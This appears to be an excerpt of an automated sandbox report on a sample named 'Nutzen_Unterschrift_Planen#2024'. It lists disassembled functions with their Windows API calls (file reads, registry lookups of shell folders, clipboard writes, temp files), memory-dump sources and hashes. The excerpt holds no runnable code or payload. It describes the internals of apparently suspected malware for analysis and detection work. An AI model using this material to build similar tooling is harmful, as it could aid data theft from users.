                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: EnumNamesResource
                                                            • String ID:
                                                            • API String ID: 3334572018-0
                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                            • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004095FC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3655998216-0
                                                            • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                            • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00445426
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                            • String ID:
                                                            • API String ID: 1828521557-0
                                                            • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                            • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                            Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@FilePointermemcpy
                                                            • String ID:
                                                            • API String ID: 609303285-0
                                                            • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                            • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                            Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID:
                                                            • API String ID: 2081463915-0
                                                            • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                            • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                            • String ID:
                                                            • API String ID: 2136311172-0
                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@
                                                            • String ID:
                                                            • API String ID: 1936579350-0
                                                            • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                            • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                            Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                            • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                            • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                            • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                            Non-executed Functions

                                                            Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                            • GetLastError.KERNEL32 ref: 00409974
                                                            • CloseClipboard.USER32 ref: 0040997D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                            • String ID:
                                                            • API String ID: 3604893535-0
                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                            Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00409882
                                                            • wcslen.MSVCRT ref: 0040988F
                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                            • CloseClipboard.USER32 ref: 004098D7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                            • String ID:
                                                            • API String ID: 1213725291-0
                                                            • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                            • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                            • free.MSVCRT ref: 00418370
                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75D4DF80,?,0041755F,?), ref: 00417452
                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                            • String ID: OsError 0x%x (%u)
                                                            • API String ID: 2360000266-2664311388
                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                            Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            • OpenClipboard.USER32(?), ref: 00411878
                                                            • GetLastError.KERNEL32 ref: 0041188D
                                                            • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                              • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                              • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                              • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                              • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                              • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                            Memory Dump Source
